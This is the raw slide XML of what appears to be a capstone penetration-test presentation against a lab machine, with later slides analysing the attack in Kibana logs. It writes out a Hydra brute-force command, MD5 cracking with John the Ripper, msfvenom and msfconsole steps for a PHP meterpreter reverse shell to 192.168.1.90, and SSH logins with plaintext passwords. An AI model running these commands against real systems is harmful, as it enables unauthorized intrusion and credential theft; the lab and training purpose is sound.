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Thin"/>
      <p:regular r:id="rId38"/>
      <p:bold r:id="rId39"/>
      <p:italic r:id="rId40"/>
      <p:boldItalic r:id="rId41"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId42"/>
      <p:boldItalic r:id="rId43"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium"/>
      <p:regular r:id="rId44"/>
      <p:bold r:id="rId45"/>
      <p:italic r:id="rId46"/>
      <p:boldItalic r:id="rId47"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId48"/>
      <p:bold r:id="rId49"/>
      <p:italic r:id="rId50"/>
      <p:boldItalic r:id="rId51"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light"/>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D3006A-5C03-46F3-BC92-FD3BB4A177DF}">
  <a:tblStyle styleId="{75D3006A-5C03-46F3-BC92-FD3BB4A177D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Thin-italic.fntdata"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-regular.fntdata"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-boldItalic.fntdata"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-italic.fntdata"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto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font" Target="fonts/RobotoMedium-boldItalic.fntdata"/><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Thin-bold.fntdata"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-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RobotoLight-bold.fntdata"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-regular.fntdata"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-boldItalic.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-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bd8eb34c7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bd8eb34c7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bd8eb34c7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bd8eb34c7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bd8eb34c71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bd8eb34c71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bd8eb34c7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bd8eb34c7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bd66a7644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bd66a7644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bd8eb34c7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bd8eb34c7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bd8eb34c71_3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bd8eb34c71_3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bda8c024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bda8c024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bd8eb34c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bd8eb34c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9.png"/><Relationship Id="rId4"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9.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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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9.png"/><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1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId5"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33.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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46.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4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6.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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67.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.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83.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.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5.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12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8.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12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9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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8.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111.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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19.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image121.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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19.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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19.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image131.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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19.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image123.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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draw.io" TargetMode="External"/><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5.png"/><Relationship Id="rId4"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pic>
        <p:nvPicPr>
          <p:cNvPr id="1114" name="Google Shape;1114;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143998"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Brute Force Vulnerability</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120" name="Google Shape;1120;p64"/>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4"/>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After discovering the directories, sensitive credentials were found and then used as input with Hydra to gain access to the locked folders. Once authenticated, hashed credentials were discovered and then quickly a hash collision was performed with John the Ripper in order to find the original plain-text-input. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1122" name="Google Shape;1122;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1123" name="Google Shape;1123;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24" name="Google Shape;1124;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64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1126" name="Google Shape;1126;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7" name="Google Shape;1127;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8" name="Google Shape;1128;p64"/>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4"/>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Our team discovered an employee’s credentials to a hidden directory containing security information, specifically pertaining to the CEO’s credentials. Lastly our team gained access to the WebDAV shared folder by cracking the MD5 hash using John the Ripper on the CEO’s credentials. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1130" name="Google Shape;1130;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1131" name="Google Shape;1131;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32" name="Google Shape;1132;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64"/>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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6344075" y="1481375"/>
            <a:ext cx="2428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a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ydra -l asthon -P rockyou.txt -f -Vv 192.168.1.105 http-get /company_folders/secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>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j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ohn --show --format=raw-md5 ryan.txt</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pic>
        <p:nvPicPr>
          <p:cNvPr id="1139" name="Google Shape;1139;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="407325"/>
            <a:ext cx="9143999" cy="1078975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1140" name="Google Shape;1140;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144001" cy="407325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1141" name="Google Shape;1141;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1486300"/>
            <a:ext cx="9144001" cy="36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pic>
        <p:nvPicPr>
          <p:cNvPr id="1146" name="Google Shape;1146;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143998"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Unauthorized File Upload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1152" name="Google Shape;1152;p67"/>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7"/>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Having access to the shared WebDAV folder our team utilized MSFvenom in order to create a custom php-based reverse tcp shell in order to set up a meterpreter session through msfconsole. After activating the payload our team successfully established a bash shell session within the Capstone machine thus gaining access.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54" name="Google Shape;1154;p67"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1155" name="Google Shape;1155;p6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56" name="Google Shape;1156;p6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67"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1158" name="Google Shape;1158;p6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59" name="Google Shape;1159;p6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 name="Google Shape;1160;p67"/>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7"/>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Our team was able to successfully upload a payload to the WebDAV folder. This allowed for the successful establishment of a reverse_tcp connection. This execution of the payload allowed for system-wide access and file upload/download.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1162" name="Google Shape;1162;p67"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1163" name="Google Shape;1163;p6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64" name="Google Shape;1164;p6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5" name="Google Shape;1165;p67"/>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7"/>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msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=4444 -f raw -o shell.php</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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msfconsole</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2. multi/handler</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3. set payload php/meterpreter/reverse_tcp</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4. set LHOST 192.168.1.90</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5. set LPORT 4444</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6. exploit</a:t>
            </a:r>
            <a:endParaRPr sz="12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pic>
        <p:nvPicPr>
          <p:cNvPr id="1171" name="Google Shape;1171;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-12"/>
            <a:ext cx="8191500" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1172" name="Google Shape;1172;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="942963"/>
            <a:ext cx="5418210" cy="3895738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1173" name="Google Shape;1173;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1788860" y="2579038"/>
            <a:ext cx="3388715" cy="1794026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1174" name="Google Shape;1174;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="1826" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5418200" y="242200"/>
            <a:ext cx="3388726" cy="2171250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1175" name="Google Shape;1175;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5418200" y="2339500"/>
            <a:ext cx="3517140" cy="2804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SSH</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1181" name="Google Shape;1181;p69"/>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9"/>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After running a nmap scan, found the IP was open to a SSH port 22 connection. Once credentials were gained attempted to reuse the same credentials for an employee and CEO. Both were viable to gain a remote SSH shell connection.</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83" name="Google Shape;1183;p69"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1184" name="Google Shape;1184;p6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85" name="Google Shape;1185;p6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69"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1187" name="Google Shape;1187;p6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88" name="Google Shape;1188;p6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9" name="Google Shape;1189;p69"/>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9"/>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Gained SSH shell with two sets of credentials. Able to traverse system as a verified user gaining sensitive data.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1191" name="Google Shape;1191;p69"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1192" name="Google Shape;1192;p6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93" name="Google Shape;1193;p6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4" name="Google Shape;1194;p69"/>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9"/>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s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>sh ashton@192.168.1.105</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pw- leopoldo</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ssh ryan@192.168.1.105</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pw- linux4u</a:t>
            </a:r>
            <a:endParaRPr sz="12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pic>
        <p:nvPicPr>
          <p:cNvPr id="1200" name="Google Shape;1200;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="837600"/>
            <a:ext cx="6270000" cy="4305901"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1201" name="Google Shape;1201;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4007550" y="0"/>
            <a:ext cx="5136450" cy="4170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pic>
        <p:nvPicPr>
          <p:cNvPr id="1206" name="Google Shape;1206;p71"/>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07" name="Google Shape;1207;p71"/>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208" name="Google Shape;1208;p7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214" name="Google Shape;1214;p72"/>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latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1215" name="Google Shape;1215;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286725" y="675975"/>
            <a:ext cx="83361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 initial port scanning occured on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Feb 5, 2021 at 3:55am</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>305,823 packets came from the source IP of 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>The threshold for normal HTTP traffic was greatly exceeded indicating a port scan was occuring. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1216" name="Google Shape;1216;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="286725" y="721037"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1217" name="Google Shape;1217;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="2676"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1467800"/>
            <a:ext cx="4428250" cy="2874550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1218" name="Google Shape;1218;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2679800" y="2185922"/>
            <a:ext cx="6096850" cy="189945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224" name="Google Shape;1224;p73"/>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 screenshot of Kibana logs depicting the request for the hidden directory. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1225" name="Google Shape;1225;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285650" y="741300"/>
            <a:ext cx="91686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On Feb 10, 2021 at 3:00am there were a total of 14 requests made for the hidden directory “/secret_folder”. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>This hidden directory contained a file “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>connect_to_corp_server” which housed the CEO’s </a:t>
            </a:r>
            <a:r>
